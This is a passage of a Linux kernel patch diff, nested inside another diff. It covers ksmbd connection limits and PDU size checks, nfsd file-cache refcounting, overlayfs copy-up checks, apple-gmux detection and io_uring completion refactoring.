+ 		ses->auth_key.response = kmemdup(msg->data, msg->sesskey_len,
+ 						 GFP_KERNEL);
+ 		if (!ses->auth_key.response) {
+diff --git a/fs/cifs/smbdirect.c b/fs/cifs/smbdirect.c
+index 90789aaa6567e..8c816b25ce7c6 100644
+--- a/fs/cifs/smbdirect.c
++++ b/fs/cifs/smbdirect.c
+@@ -1405,6 +1405,7 @@ void smbd_destroy(struct TCP_Server_Info *server)
+ 	destroy_workqueue(info->workqueue);
+ 	log_rdma_event(INFO,  "rdma session destroyed\n");
+ 	kfree(info);
++	server->smbd_conn = NULL;
+ }
+ 
+ /*
+diff --git a/fs/erofs/zdata.c b/fs/erofs/zdata.c
+index cf4871834ebb2..ee7c88c9b5afa 100644
+--- a/fs/erofs/zdata.c
++++ b/fs/erofs/zdata.c
+@@ -1047,12 +1047,12 @@ static int z_erofs_decompress_pcluster(struct z_erofs_decompress_backend *be,
+ 
+ 	if (!be->decompressed_pages)
+ 		be->decompressed_pages =
+-			kvcalloc(be->nr_pages, sizeof(struct page *),
+-				 GFP_KERNEL | __GFP_NOFAIL);
++			kcalloc(be->nr_pages, sizeof(struct page *),
++				GFP_KERNEL | __GFP_NOFAIL);
+ 	if (!be->compressed_pages)
+ 		be->compressed_pages =
+-			kvcalloc(pclusterpages, sizeof(struct page *),
+-				 GFP_KERNEL | __GFP_NOFAIL);
++			kcalloc(pclusterpages, sizeof(struct page *),
++				GFP_KERNEL | __GFP_NOFAIL);
+ 
+ 	z_erofs_parse_out_bvecs(be);
+ 	err2 = z_erofs_parse_in_bvecs(be, &overlapped);
+@@ -1100,7 +1100,7 @@ out:
+ 	}
+ 	if (be->compressed_pages < be->onstack_pages ||
+ 	    be->compressed_pages >= be->onstack_pages + Z_EROFS_ONSTACK_PAGES)
+-		kvfree(be->compressed_pages);
++		kfree(be->compressed_pages);
+ 	z_erofs_fill_other_copies(be, err);
+ 
+ 	for (i = 0; i < be->nr_pages; ++i) {
+@@ -1119,7 +1119,7 @@ out:
+ 	}
+ 
+ 	if (be->decompressed_pages != be->onstack_pages)
+-		kvfree(be->decompressed_pages);
++		kfree(be->decompressed_pages);
+ 
+ 	pcl->length = 0;
+ 	pcl->partial = true;
+diff --git a/fs/ksmbd/connection.c b/fs/ksmbd/connection.c
+index fd0a288af299e..56be077e5d8ac 100644
+--- a/fs/ksmbd/connection.c
++++ b/fs/ksmbd/connection.c
+@@ -280,7 +280,7 @@ int ksmbd_conn_handler_loop(void *p)
+ {
+ 	struct ksmbd_conn *conn = (struct ksmbd_conn *)p;
+ 	struct ksmbd_transport *t = conn->transport;
+-	unsigned int pdu_size;
++	unsigned int pdu_size, max_allowed_pdu_size;
+ 	char hdr_buf[4] = {0,};
+ 	int size;
+ 
+@@ -305,13 +305,26 @@ int ksmbd_conn_handler_loop(void *p)
+ 		pdu_size = get_rfc1002_len(hdr_buf);
+ 		ksmbd_debug(CONN, "RFC1002 header %u bytes\n", pdu_size);
+ 
++		if (conn->status == KSMBD_SESS_GOOD)
++			max_allowed_pdu_size =
++				SMB3_MAX_MSGSIZE + conn->vals->max_write_size;
++		else
++			max_allowed_pdu_size = SMB3_MAX_MSGSIZE;
++
++		if (pdu_size > max_allowed_pdu_size) {
++			pr_err_ratelimited("PDU length(%u) exceeds maximum allowed pdu size(%u) on connection(%d)\n",
++					pdu_size, max_allowed_pdu_size,
++					conn->status);
++			break;
++		}
++
+ 		/*
+ 		 * Check if pdu size is valid (min : smb header size,
+ 		 * max : 0x00FFFFFF).
+ 		 */
+ 		if (pdu_size < __SMB2_HEADER_STRUCTURE_SIZE ||
+ 		    pdu_size > MAX_STREAM_PROT_LEN) {
+-			continue;
++			break;
+ 		}
+ 
+ 		/* 4 for rfc1002 length field */
+diff --git a/fs/ksmbd/ksmbd_netlink.h b/fs/ksmbd/ksmbd_netlink.h
+index ff07c67f4565e..ce866ff159bfe 100644
+--- a/fs/ksmbd/ksmbd_netlink.h
++++ b/fs/ksmbd/ksmbd_netlink.h
+@@ -105,7 +105,8 @@ struct ksmbd_startup_request {
+ 	__u32	sub_auth[3];		/* Subauth value for Security ID */
+ 	__u32	smb2_max_credits;	/* MAX credits */
+ 	__u32	smbd_max_io_size;	/* smbd read write size */
+-	__u32	reserved[127];		/* Reserved room */
++	__u32	max_connections;	/* Maximum number of simultaneous connections */
++	__u32	reserved[126];		/* Reserved room */
+ 	__u32	ifc_list_sz;		/* interfaces list size */
+ 	__s8	____payload[];
+ };
+diff --git a/fs/ksmbd/ndr.c b/fs/ksmbd/ndr.c
+index 0ae8d08d85a87..4d9e0b54e3dbf 100644
+--- a/fs/ksmbd/ndr.c
++++ b/fs/ksmbd/ndr.c
+@@ -242,7 +242,7 @@ int ndr_decode_dos_attr(struct ndr *n, struct xattr_dos_attrib *da)
+ 		return ret;
+ 
+ 	if (da->version != 3 && da->version != 4) {
+-		pr_err("v%d version is not supported\n", da->version);
++		ksmbd_debug(VFS, "v%d version is not supported\n", da->version);
+ 		return -EINVAL;
+ 	}
+ 
+@@ -251,7 +251,7 @@ int ndr_decode_dos_attr(struct ndr *n, struct xattr_dos_attrib *da)
+ 		return ret;
+ 
+ 	if (da->version != version2) {
+-		pr_err("ndr version mismatched(version: %d, version2: %d)\n",
++		ksmbd_debug(VFS, "ndr version mismatched(version: %d, version2: %d)\n",
+ 		       da->version, version2);
+ 		return -EINVAL;
+ 	}
+@@ -457,7 +457,7 @@ int ndr_decode_v4_ntacl(struct ndr *n, struct xattr_ntacl *acl)
+ 	if (ret)
+ 		return ret;
+ 	if (acl->version != 4) {
+-		pr_err("v%d version is not supported\n", acl->version);
++		ksmbd_debug(VFS, "v%d version is not supported\n", acl->version);
+ 		return -EINVAL;
+ 	}
+ 
+@@ -465,7 +465,7 @@ int ndr_decode_v4_ntacl(struct ndr *n, struct xattr_ntacl *acl)
+ 	if (ret)
+ 		return ret;
+ 	if (acl->version != version2) {
+-		pr_err("ndr version mismatched(version: %d, version2: %d)\n",
++		ksmbd_debug(VFS, "ndr version mismatched(version: %d, version2: %d)\n",
+ 		       acl->version, version2);
+ 		return -EINVAL;
+ 	}
+diff --git a/fs/ksmbd/server.h b/fs/ksmbd/server.h
+index ac9d932f8c8aa..db72781817603 100644
+--- a/fs/ksmbd/server.h
++++ b/fs/ksmbd/server.h
+@@ -41,6 +41,7 @@ struct ksmbd_server_config {
+ 	unsigned int		share_fake_fscaps;
+ 	struct smb_sid		domain_sid;
+ 	unsigned int		auth_mechs;
++	unsigned int		max_connections;
+ 
+ 	char			*conf[SERVER_CONF_WORK_GROUP + 1];
+ };
+diff --git a/fs/ksmbd/smb2pdu.c b/fs/ksmbd/smb2pdu.c
+index 533742ebcb379..9b16ee657b51a 100644
+--- a/fs/ksmbd/smb2pdu.c
++++ b/fs/ksmbd/smb2pdu.c
+@@ -8657,6 +8657,7 @@ int smb3_decrypt_req(struct ksmbd_work *work)
+ bool smb3_11_final_sess_setup_resp(struct ksmbd_work *work)
+ {
+ 	struct ksmbd_conn *conn = work->conn;
++	struct ksmbd_session *sess = work->sess;
+ 	struct smb2_hdr *rsp = smb2_get_msg(work->response_buf);
+ 
+ 	if (conn->dialect < SMB30_PROT_ID)
+@@ -8666,6 +8667,7 @@ bool smb3_11_final_sess_setup_resp(struct ksmbd_work *work)
+ 		rsp = ksmbd_resp_buf_next(work);
+ 
+ 	if (le16_to_cpu(rsp->Command) == SMB2_SESSION_SETUP_HE &&
++	    sess->user && !user_guest(sess->user) &&
+ 	    rsp->Status == STATUS_SUCCESS)
+ 		return true;
+ 	return false;
+diff --git a/fs/ksmbd/smb2pdu.h b/fs/ksmbd/smb2pdu.h
+index 092fdd3f87505..f4baa9800f6ee 100644
+--- a/fs/ksmbd/smb2pdu.h
++++ b/fs/ksmbd/smb2pdu.h
+@@ -24,8 +24,9 @@
+ 
+ #define SMB21_DEFAULT_IOSIZE	(1024 * 1024)
+ #define SMB3_DEFAULT_TRANS_SIZE	(1024 * 1024)
+-#define SMB3_MIN_IOSIZE	(64 * 1024)
+-#define SMB3_MAX_IOSIZE	(8 * 1024 * 1024)
++#define SMB3_MIN_IOSIZE		(64 * 1024)
++#define SMB3_MAX_IOSIZE		(8 * 1024 * 1024)
++#define SMB3_MAX_MSGSIZE	(4 * 4096)
+ 
+ /*
+  *	Definitions for SMB2 Protocol Data Units (network frames)
+diff --git a/fs/ksmbd/transport_ipc.c b/fs/ksmbd/transport_ipc.c
+index c9aca21637d5b..40c721f9227e4 100644
+--- a/fs/ksmbd/transport_ipc.c
++++ b/fs/ksmbd/transport_ipc.c
+@@ -308,6 +308,9 @@ static int ipc_server_config_on_startup(struct ksmbd_startup_request *req)
+ 	if (req->smbd_max_io_size)
+ 		init_smbd_max_io_size(req->smbd_max_io_size);
+ 
++	if (req->max_connections)
++		server_conf.max_connections = req->max_connections;
++
+ 	ret = ksmbd_set_netbios_name(req->netbios_name);
+ 	ret |= ksmbd_set_server_string(req->server_string);
+ 	ret |= ksmbd_set_work_group(req->work_group);
+diff --git a/fs/ksmbd/transport_tcp.c b/fs/ksmbd/transport_tcp.c
+index 4c6bd0b699791..603893fd87f57 100644
+--- a/fs/ksmbd/transport_tcp.c
++++ b/fs/ksmbd/transport_tcp.c
+@@ -15,6 +15,8 @@
+ #define IFACE_STATE_DOWN		BIT(0)
+ #define IFACE_STATE_CONFIGURED		BIT(1)
+ 
++static atomic_t active_num_conn;
++
+ struct interface {
+ 	struct task_struct	*ksmbd_kthread;
+ 	struct socket		*ksmbd_socket;
+@@ -185,8 +187,10 @@ static int ksmbd_tcp_new_connection(struct socket *client_sk)
+ 	struct tcp_transport *t;
+ 
+ 	t = alloc_transport(client_sk);
+-	if (!t)
++	if (!t) {
++		sock_release(client_sk);
+ 		return -ENOMEM;
++	}
+ 
+ 	csin = KSMBD_TCP_PEER_SOCKADDR(KSMBD_TRANS(t)->conn);
+ 	if (kernel_getpeername(client_sk, csin) < 0) {
+@@ -239,6 +243,15 @@ static int ksmbd_kthread_fn(void *p)
+ 			continue;
+ 		}
+ 
++		if (server_conf.max_connections &&
++		    atomic_inc_return(&active_num_conn) >= server_conf.max_connections) {
++			pr_info_ratelimited("Limit the maximum number of connections(%u)\n",
++					    atomic_read(&active_num_conn));
++			atomic_dec(&active_num_conn);
++			sock_release(client_sk);
++			continue;
++		}
++
+ 		ksmbd_debug(CONN, "connect success: accepted new connection\n");
+ 		client_sk->sk->sk_rcvtimeo = KSMBD_TCP_RECV_TIMEOUT;
+ 		client_sk->sk->sk_sndtimeo = KSMBD_TCP_SEND_TIMEOUT;
+@@ -368,6 +381,8 @@ static int ksmbd_tcp_writev(struct ksmbd_transport *t, struct kvec *iov,
+ static void ksmbd_tcp_disconnect(struct ksmbd_transport *t)
+ {
+ 	free_transport(TCP_TRANS(t));
++	if (server_conf.max_connections)
++		atomic_dec(&active_num_conn);
+ }
+ 
+ static void tcp_destroy_socket(struct socket *ksmbd_socket)
+diff --git a/fs/nfsd/filecache.c b/fs/nfsd/filecache.c
+index ea6fb0e6b1655..142b3c928f76e 100644
+--- a/fs/nfsd/filecache.c
++++ b/fs/nfsd/filecache.c
+@@ -638,6 +638,39 @@ static struct shrinker	nfsd_file_shrinker = {
+ 	.seeks = 1,
+ };
+ 
++/**
++ * nfsd_file_cond_queue - conditionally unhash and queue an nfsd_file
++ * @nf: nfsd_file to attempt to queue
++ * @dispose: private list to queue successfully-put objects
++ *
++ * Unhash an nfsd_file, try to get a reference to it, and then put that
++ * reference. If it's the last reference, queue it to the dispose list.
++ */
++static void
++nfsd_file_cond_queue(struct nfsd_file *nf, struct list_head *dispose)
++	__must_hold(RCU)
++{
++	int decrement = 1;
++
++	/* If we raced with someone else unhashing, ignore it */
++	if (!nfsd_file_unhash(nf))
++		return;
++
++	/* If we can't get a reference, ignore it */
++	if (!nfsd_file_get(nf))
++		return;
++
++	/* Extra decrement if we remove from the LRU */
++	if (nfsd_file_lru_remove(nf))
++		++decrement;
++
++	/* If refcount goes to 0, then put on the dispose list */
++	if (refcount_sub_and_test(decrement, &nf->nf_ref)) {
++		list_add(&nf->nf_lru, dispose);
++		trace_nfsd_file_closing(nf);
++	}
++}
++
+ /**
+  * nfsd_file_queue_for_close: try to close out any open nfsd_files for an inode
+  * @inode:   inode on which to close out nfsd_files
+@@ -665,30 +698,11 @@ nfsd_file_queue_for_close(struct inode *inode, struct list_head *dispose)
+ 
+ 	rcu_read_lock();
+ 	do {
+-		int decrement = 1;
+-
+ 		nf = rhashtable_lookup(&nfsd_file_rhash_tbl, &key,
+ 				       nfsd_file_rhash_params);
+ 		if (!nf)
+ 			break;
+-
+-		/* If we raced with someone else unhashing, ignore it */
+-		if (!nfsd_file_unhash(nf))
+-			continue;
+-
+-		/* If we can't get a reference, ignore it */
+-		if (!nfsd_file_get(nf))
+-			continue;
+-
+-		/* Extra decrement if we remove from the LRU */
+-		if (nfsd_file_lru_remove(nf))
+-			++decrement;
+-
+-		/* If refcount goes to 0, then put on the dispose list */
+-		if (refcount_sub_and_test(decrement, &nf->nf_ref)) {
+-			list_add(&nf->nf_lru, dispose);
+-			trace_nfsd_file_closing(nf);
+-		}
++		nfsd_file_cond_queue(nf, dispose);
+ 	} while (1);
+ 	rcu_read_unlock();
+ }
+@@ -905,11 +919,8 @@ __nfsd_file_cache_purge(struct net *net)
+ 
+ 		nf = rhashtable_walk_next(&iter);
+ 		while (!IS_ERR_OR_NULL(nf)) {
+-			if (!net || nf->nf_net == net) {
+-				nfsd_file_unhash(nf);
+-				nfsd_file_lru_remove(nf);
+-				list_add(&nf->nf_lru, &dispose);
+-			}
++			if (!net || nf->nf_net == net)
++				nfsd_file_cond_queue(nf, &dispose);
+ 			nf = rhashtable_walk_next(&iter);
+ 		}
+ 
+diff --git a/fs/nfsd/nfs4proc.c b/fs/nfsd/nfs4proc.c
+index 30a08ec31a703..ba04ce9b9fa51 100644
+--- a/fs/nfsd/nfs4proc.c
++++ b/fs/nfsd/nfs4proc.c
+@@ -1331,6 +1331,7 @@ try_again:
+ 			/* allow 20secs for mount/unmount for now - revisit */
+ 			if (signal_pending(current) ||
+ 					(schedule_timeout(20*HZ) == 0)) {
++				finish_wait(&nn->nfsd_ssc_waitq, &wait);
+ 				kfree(work);
+ 				return nfserr_eagain;
+ 			}
+diff --git a/fs/overlayfs/copy_up.c b/fs/overlayfs/copy_up.c
+index f436d8847f085..91a95bfad0d1c 100644
+--- a/fs/overlayfs/copy_up.c
++++ b/fs/overlayfs/copy_up.c
+@@ -754,7 +754,7 @@ static int ovl_copy_up_tmpfile(struct ovl_copy_up_ctx *c)
+ 	if (!c->metacopy && c->stat.size) {
+ 		err = ovl_copy_up_file(ofs, c->dentry, tmpfile, c->stat.size);
+ 		if (err)
+-			return err;
++			goto out_fput;
+ 	}
+ 
+ 	err = ovl_copy_up_metadata(c, temp);
+@@ -973,6 +973,10 @@ static int ovl_copy_up_one(struct dentry *parent, struct dentry *dentry,
+ 	if (err)
+ 		return err;
+ 
++	if (!kuid_has_mapping(current_user_ns(), ctx.stat.uid) ||
++	    !kgid_has_mapping(current_user_ns(), ctx.stat.gid))
++		return -EOVERFLOW;
++
+ 	ctx.metacopy = ovl_need_meta_copy_up(dentry, ctx.stat.mode, flags);
+ 
+ 	if (parent) {
+diff --git a/include/drm/drm_vma_manager.h b/include/drm/drm_vma_manager.h
+index 4f8c35206f7cd..6c2a2f21dbf00 100644
+--- a/include/drm/drm_vma_manager.h
++++ b/include/drm/drm_vma_manager.h
+@@ -74,6 +74,7 @@ void drm_vma_offset_remove(struct drm_vma_offset_manager *mgr,
+ 			   struct drm_vma_offset_node *node);
+ 
+ int drm_vma_node_allow(struct drm_vma_offset_node *node, struct drm_file *tag);
++int drm_vma_node_allow_once(struct drm_vma_offset_node *node, struct drm_file *tag);
+ void drm_vma_node_revoke(struct drm_vma_offset_node *node,
+ 			 struct drm_file *tag);
+ bool drm_vma_node_is_allowed(struct drm_vma_offset_node *node,
+diff --git a/include/linux/apple-gmux.h b/include/linux/apple-gmux.h
+index ddb10aa67b143..1f68b49bcd688 100644
+--- a/include/linux/apple-gmux.h
++++ b/include/linux/apple-gmux.h
+@@ -8,18 +8,118 @@
+ #define LINUX_APPLE_GMUX_H
+ 
+ #include <linux/acpi.h>
++#include <linux/io.h>
++#include <linux/pnp.h>
+ 
+ #define GMUX_ACPI_HID "APP000B"
+ 
++/*
++ * gmux port offsets. Many of these are not yet used, but may be used in
++ * the future, and it's useful to have them documented here anyhow.
++ */
++#define GMUX_PORT_VERSION_MAJOR		0x04
++#define GMUX_PORT_VERSION_MINOR		0x05
++#define GMUX_PORT_VERSION_RELEASE	0x06
++#define GMUX_PORT_SWITCH_DISPLAY	0x10
++#define GMUX_PORT_SWITCH_GET_DISPLAY	0x11
++#define GMUX_PORT_INTERRUPT_ENABLE	0x14
++#define GMUX_PORT_INTERRUPT_STATUS	0x16
++#define GMUX_PORT_SWITCH_DDC		0x28
++#define GMUX_PORT_SWITCH_EXTERNAL	0x40
++#define GMUX_PORT_SWITCH_GET_EXTERNAL	0x41
++#define GMUX_PORT_DISCRETE_POWER	0x50
++#define GMUX_PORT_MAX_BRIGHTNESS	0x70
++#define GMUX_PORT_BRIGHTNESS		0x74
++#define GMUX_PORT_VALUE			0xc2
++#define GMUX_PORT_READ			0xd0
++#define GMUX_PORT_WRITE			0xd4
++
++#define GMUX_MIN_IO_LEN			(GMUX_PORT_BRIGHTNESS + 4)
++
+ #if IS_ENABLED(CONFIG_APPLE_GMUX)
++static inline bool apple_gmux_is_indexed(unsigned long iostart)
++{
++	u16 val;
++
++	outb(0xaa, iostart + 0xcc);
++	outb(0x55, iostart + 0xcd);
++	outb(0x00, iostart + 0xce);
++
++	val = inb(iostart + 0xcc) | (inb(iostart + 0xcd) << 8);
++	if (val == 0x55aa)
++		return true;
++
++	return false;
++}
+ 
+ /**
+- * apple_gmux_present() - detect if gmux is built into the machine
++ * apple_gmux_detect() - detect if gmux is built into the machine
++ *
++ * @pnp_dev:     Device to probe or NULL to use the first matching device
++ * @indexed_ret: Returns (by reference) if the gmux is indexed or not
++ *
++ * Detect if a supported gmux device is present by actually probing it.
++ * This avoids the false positives returned on some models by
++ * apple_gmux_present().
++ *
++ * Return: %true if a supported gmux ACPI device is detected and the kernel
++ * was configured with CONFIG_APPLE_GMUX, %false otherwise.
++ */
++static inline bool apple_gmux_detect(struct pnp_dev *pnp_dev, bool *indexed_ret)
++{
++	u8 ver_major, ver_minor, ver_release;
++	struct device *dev = NULL;
++	struct acpi_device *adev;
++	struct resource *res;
++	bool indexed = false;
++	bool ret = false;
++
++	if (!pnp_dev) {
++		adev = acpi_dev_get_first_match_dev(GMUX_ACPI_HID, NULL, -1);
++		if (!adev)
++			return false;
++
++		dev = get_device(acpi_get_first_physical_node(adev));
++		acpi_dev_put(adev);
++		if (!dev)
++			return false;
++
++		pnp_dev = to_pnp_dev(dev);
++	}
++
++	res = pnp_get_resource(pnp_dev, IORESOURCE_IO, 0);
++	if (!res || resource_size(res) < GMUX_MIN_IO_LEN)
++		goto out;
++
++	/*
++	 * Invalid version information may indicate either that the gmux
++	 * device isn't present or that it's a new one that uses indexed io.
++	 */
++	ver_major = inb(res->start + GMUX_PORT_VERSION_MAJOR);
++	ver_minor = inb(res->start + GMUX_PORT_VERSION_MINOR);
++	ver_release = inb(res->start + GMUX_PORT_VERSION_RELEASE);
++	if (ver_major == 0xff && ver_minor == 0xff && ver_release == 0xff) {
++		indexed = apple_gmux_is_indexed(res->start);
++		if (!indexed)
++			goto out;
++	}
++
++	if (indexed_ret)
++		*indexed_ret = indexed;
++
++	ret = true;
++out:
++	put_device(dev);
++	return ret;
++}
++
++/**
++ * apple_gmux_present() - check if gmux ACPI device is present
+  *
+  * Drivers may use this to activate quirks specific to dual GPU MacBook Pros
+  * and Mac Pros, e.g. for deferred probing, runtime pm and backlight.
+  *
+- * Return: %true if gmux is present and the kernel was configured
++ * Return: %true if gmux ACPI device is present and the kernel was configured
+  * with CONFIG_APPLE_GMUX, %false otherwise.
+  */
+ static inline bool apple_gmux_present(void)
+@@ -34,6 +134,11 @@ static inline bool apple_gmux_present(void)
+ 	return false;
+ }
+ 
++static inline bool apple_gmux_detect(struct pnp_dev *pnp_dev, bool *indexed_ret)
++{
++	return false;
++}
++
+ #endif /* !CONFIG_APPLE_GMUX */
+ 
+ #endif /* LINUX_APPLE_GMUX_H */
+diff --git a/include/linux/platform_data/x86/simatic-ipc.h b/include/linux/platform_data/x86/simatic-ipc.h
+index 632320ec8f082..a48bb52409777 100644
+--- a/include/linux/platform_data/x86/simatic-ipc.h
++++ b/include/linux/platform_data/x86/simatic-ipc.h
+@@ -32,7 +32,8 @@ enum simatic_ipc_station_ids {
+ 	SIMATIC_IPC_IPC477E = 0x00000A02,
+ 	SIMATIC_IPC_IPC127E = 0x00000D01,
+ 	SIMATIC_IPC_IPC227G = 0x00000F01,
+-	SIMATIC_IPC_IPC427G = 0x00001001,
++	SIMATIC_IPC_IPCBX_39A = 0x00001001,
++	SIMATIC_IPC_IPCPX_39A = 0x00001002,
+ };
+ 
+ static inline u32 simatic_ipc_get_station_id(u8 *data, int max_len)
+diff --git a/include/linux/thermal.h b/include/linux/thermal.h
+index 9ecc128944a19..5e093602e8fcd 100644
+--- a/include/linux/thermal.h
++++ b/include/linux/thermal.h
+@@ -100,6 +100,7 @@ struct thermal_cooling_device_ops {
+ struct thermal_cooling_device {
+ 	int id;
+ 	char *type;
++	unsigned long max_state;
+ 	struct device device;
+ 	struct device_node *np;
+ 	void *devdata;
+diff --git a/include/net/mac80211.h b/include/net/mac80211.h
+index ac2bad57933f8..72b739dc6d530 100644
+--- a/include/net/mac80211.h
++++ b/include/net/mac80211.h
+@@ -1827,8 +1827,6 @@ struct ieee80211_vif_cfg {
+  * @drv_priv: data area for driver use, will always be aligned to
+  *	sizeof(void \*).
+  * @txq: the multicast data TX queue (if driver uses the TXQ abstraction)
+- * @txqs_stopped: per AC flag to indicate that intermediate TXQs are stopped,
+- *	protected by fq->lock.
+ * @offload_flags: 802.3 -> 802.11 encapsulation offload flags, see
+  *	&enum ieee80211_offload_flags.
+  * @mbssid_tx_vif: Pointer to the transmitting interface if MBSSID is enabled.
+@@ -1857,8 +1855,6 @@ struct ieee80211_vif {
+ 	bool probe_req_reg;
+ 	bool rx_mcast_action_reg;
+ 
+-	bool txqs_stopped[IEEE80211_NUM_ACS];
+-
+ 	struct ieee80211_vif *mbssid_tx_vif;
+ 
+ 	/* must be last */
+diff --git a/include/net/sch_generic.h b/include/net/sch_generic.h
+index d5517719af4ef..af4aa66aaa4eb 100644
+--- a/include/net/sch_generic.h
++++ b/include/net/sch_generic.h
+@@ -1288,4 +1288,11 @@ void mq_change_real_num_tx(struct Qdisc *sch, unsigned int new_real_tx);
+ 
+ int sch_frag_xmit_hook(struct sk_buff *skb, int (*xmit)(struct sk_buff *skb));
+ 
++/* Make sure qdisc is no longer in SCHED state. */
++static inline void qdisc_synchronize(const struct Qdisc *q)
++{
++	while (test_bit(__QDISC_STATE_SCHED, &q->state))
++		msleep(1);
++}
++
+ #endif
+diff --git a/include/scsi/scsi_transport_iscsi.h b/include/scsi/scsi_transport_iscsi.h
+index cab52b0f11d0c..34c03707fb6ef 100644
+--- a/include/scsi/scsi_transport_iscsi.h
++++ b/include/scsi/scsi_transport_iscsi.h
+@@ -236,6 +236,14 @@ enum {
+ 	ISCSI_SESSION_FREE,
+ };
+ 
++enum {
++	ISCSI_SESSION_TARGET_UNBOUND,
++	ISCSI_SESSION_TARGET_ALLOCATED,
++	ISCSI_SESSION_TARGET_SCANNED,
++	ISCSI_SESSION_TARGET_UNBINDING,
++	ISCSI_SESSION_TARGET_MAX,
++};
++
+ #define ISCSI_MAX_TARGET -1
+ 
+ struct iscsi_cls_session {
+@@ -264,6 +272,7 @@ struct iscsi_cls_session {
+ 	 */
+ 	pid_t creator;
+ 	int state;
++	int target_state;			/* session target bind state */
+ 	int sid;				/* session id */
+ 	void *dd_data;				/* LLD private data */
+ 	struct device dev;	/* sysfs transport/container device */
+diff --git a/include/uapi/linux/netfilter/nf_conntrack_sctp.h b/include/uapi/linux/netfilter/nf_conntrack_sctp.h
+index edc6ddab0de6a..2d6f80d75ae74 100644
+--- a/include/uapi/linux/netfilter/nf_conntrack_sctp.h
++++ b/include/uapi/linux/netfilter/nf_conntrack_sctp.h
+@@ -15,7 +15,7 @@ enum sctp_conntrack {
+ 	SCTP_CONNTRACK_SHUTDOWN_RECD,
+ 	SCTP_CONNTRACK_SHUTDOWN_ACK_SENT,
+ 	SCTP_CONNTRACK_HEARTBEAT_SENT,
+-	SCTP_CONNTRACK_HEARTBEAT_ACKED,
++	SCTP_CONNTRACK_HEARTBEAT_ACKED,	/* no longer used */
+ 	SCTP_CONNTRACK_MAX
+ };
+ 
+diff --git a/include/uapi/linux/netfilter/nfnetlink_cttimeout.h b/include/uapi/linux/netfilter/nfnetlink_cttimeout.h
+index 6b20fb22717b2..aa805e6d4e284 100644
+--- a/include/uapi/linux/netfilter/nfnetlink_cttimeout.h
++++ b/include/uapi/linux/netfilter/nfnetlink_cttimeout.h
+@@ -94,7 +94,7 @@ enum ctattr_timeout_sctp {
+ 	CTA_TIMEOUT_SCTP_SHUTDOWN_RECD,
+ 	CTA_TIMEOUT_SCTP_SHUTDOWN_ACK_SENT,
+ 	CTA_TIMEOUT_SCTP_HEARTBEAT_SENT,
+-	CTA_TIMEOUT_SCTP_HEARTBEAT_ACKED,
++	CTA_TIMEOUT_SCTP_HEARTBEAT_ACKED, /* no longer used */
+ 	__CTA_TIMEOUT_SCTP_MAX
+ };
+ #define CTA_TIMEOUT_SCTP_MAX (__CTA_TIMEOUT_SCTP_MAX - 1)
+diff --git a/include/ufs/ufshcd.h b/include/ufs/ufshcd.h
+index 9f28349ebcff5..2bb89290da63c 100644
+--- a/include/ufs/ufshcd.h
++++ b/include/ufs/ufshcd.h
+@@ -806,6 +806,7 @@ struct ufs_hba_monitor {
+  * @urgent_bkops_lvl: keeps track of urgent bkops level for device
+  * @is_urgent_bkops_lvl_checked: keeps track if the urgent bkops level for
+  *  device is known or not.
++ * @wb_mutex: used to serialize devfreq and sysfs write booster toggling
+  * @clk_scaling_lock: used to serialize device commands and clock scaling
+  * @desc_size: descriptor sizes reported by device
+  * @scsi_block_reqs_cnt: reference counting for scsi block requests
+@@ -948,6 +949,7 @@ struct ufs_hba {
+ 	enum bkops_status urgent_bkops_lvl;
+ 	bool is_urgent_bkops_lvl_checked;
+ 
++	struct mutex wb_mutex;
+ 	struct rw_semaphore clk_scaling_lock;
+ 	unsigned char desc_size[QUERY_DESC_IDN_MAX];
+ 	atomic_t scsi_block_reqs_cnt;
+diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
+index cea5de98c4232..862e05e6691de 100644
+--- a/io_uring/io_uring.c
++++ b/io_uring/io_uring.c
+@@ -823,15 +823,19 @@ bool io_post_aux_cqe(struct io_ring_ctx *ctx,
+ 	return filled;
+ }
+ 
+-static void __io_req_complete_put(struct io_kiocb *req)
++void io_req_complete_post(struct io_kiocb *req)
+ {
++	struct io_ring_ctx *ctx = req->ctx;
++
++	io_cq_lock(ctx);
++	if (!(req->flags & REQ_F_CQE_SKIP))
++		__io_fill_cqe_req(ctx, req);
++
+ 	/*
+ 	 * If we're the last reference to this request, add to our locked
+ 	 * free_list cache.
+ 	 */
+ 	if (req_ref_put_and_test(req)) {
+-		struct io_ring_ctx *ctx = req->ctx;
+-
+ 		if (req->flags & IO_REQ_LINK_FLAGS) {
+ 			if (req->flags & IO_DISARM_MASK)
+ 				io_disarm_next(req);
+@@ -852,21 +856,6 @@ static void __io_req_complete_put(struct io_kiocb *req)
+ 		wq_list_add_head(&req->comp_list, &ctx->locked_free_list);
+ 		ctx->locked_free_nr++;
+ 	}
+-}
+-
+-void __io_req_complete_post(struct io_kiocb *req)
+-{
+-	if (!(req->flags & REQ_F_CQE_SKIP))
+-		__io_fill_cqe_req(req->ctx, req);
+-	__io_req_complete_put(req);
+-}
+-
+-void io_req_complete_post(struct io_kiocb *req)
+-{
+-	struct io_ring_ctx *ctx = req->ctx;
+-
+-	io_cq_lock(ctx);
+-	__io_req_complete_post(req);
+ 	io_cq_unlock_post(ctx);
+ }
+ 
+@@ -876,9 +865,12 @@ inline void __io_req_complete(struct io_kiocb *req, unsigned issue_flags)
+ }
+ 
+ void io_req_complete_failed(struct io_kiocb *req, s32 res)
++	__must_hold(&ctx->uring_lock)
+ {
+ 	const struct io_op_def *def = &io_op_defs[req->opcode];
+ 
++	lockdep_assert_held(&req->ctx->uring_lock);
++
+ 	req_set_fail(req);
+ 	io_req_set_res(req, res, io_put_kbuf(req, IO_URING_F_UNLOCKED));
+ 	if (def->fail)
+@@ -1133,7 +1125,7 @@ static void io_req_local_work_add(struct io_kiocb *req)
+ 	percpu_ref_put(&ctx->refs);
+ }
+ 
+-static inline void __io_req_task_work_add(struct io_kiocb *req, bool allow_local)
++void __io_req_task_work_add(struct io_kiocb *req, bool allow_local)
+ {
+ 	struct io_uring_task *tctx = req->task->io_uring;
+ 	struct io_ring_ctx *ctx = req->ctx;
+@@ -1165,11 +1157,6 @@ static inline void __io_req_task_work_add(struct io_kiocb *req, bool allow_local
+ 	}
+ }
+ 
+-void io_req_task_work_add(struct io_kiocb *req)
+-{
+-	__io_req_task_work_add(req, true);
+-}
+-
+ static void __cold io_move_task_work_from_local(struct io_ring_ctx *ctx)
+ {
+ 	struct llist_node *node;
+@@ -1243,18 +1230,6 @@ int io_run_local_work(struct io_ring_ctx *ctx)
+ 	return ret;
+ }
+ 
+-static void io_req_tw_post(struct io_kiocb *req, bool *locked)
+-{
